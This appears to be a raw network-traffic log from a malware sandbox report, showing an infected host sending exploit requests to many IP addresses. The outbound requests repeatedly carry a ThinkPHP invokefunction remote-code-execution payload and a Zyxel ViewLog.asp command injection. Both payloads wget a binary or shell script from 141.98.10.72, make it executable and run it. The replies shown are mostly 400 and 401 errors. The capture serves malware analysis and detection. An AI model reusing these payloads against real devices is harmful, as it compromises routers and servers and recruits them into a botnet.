                                                        1163192.168.2.144383688.199.63.18680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:38.545758009 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:38.762974024 CET242INHTTP/1.0 400 Bad Request
                                                        Connection: close
                                                        Content-Length: 113
                                                        Date: Sun, 13 Aug 2023 21:57:33 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1164192.168.2.144134088.218.158.14280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:40.999835014 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:41.229223967 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:35:41 GMT
                                                        Server: lighttpd/1.4.39
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
                                                        Feb 14, 2024 09:35:41.407051086 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:35:41 GMT
                                                        Server: lighttpd/1.4.39
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1165192.168.2.144134288.218.158.14280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:40.999881029 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:41.231445074 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:35:41 GMT
                                                        Server: lighttpd/1.4.39
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
                                                        Feb 14, 2024 09:35:41.407327890 CET516INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:35:41 GMT
                                                        Server: lighttpd/1.4.39
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1166192.168.2.144595885.237.215.998080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.047672033 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:41.254368067 CET396INHTTP/1.0 401 Authentication Required
                                                        WWW-Authenticate: Basic realm="proxy"
                                                        Connection: close
                                                        Content-type: text/html; charset=us-ascii
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>401 Authentication Required</title></head><body><h2>401 Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1167192.168.2.145856431.136.149.1848080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.047719002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:41.762625933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:43.170567036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:46.018529892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:51.650357008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:02.913767099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1168192.168.2.144168894.46.15.1618080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.047746897 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:41.273020983 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:41 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1169192.168.2.144861462.29.99.2498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.072524071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1170192.168.2.145893294.122.1.968080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.072630882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1171192.168.2.145252494.122.9.598080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:41.074274063 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
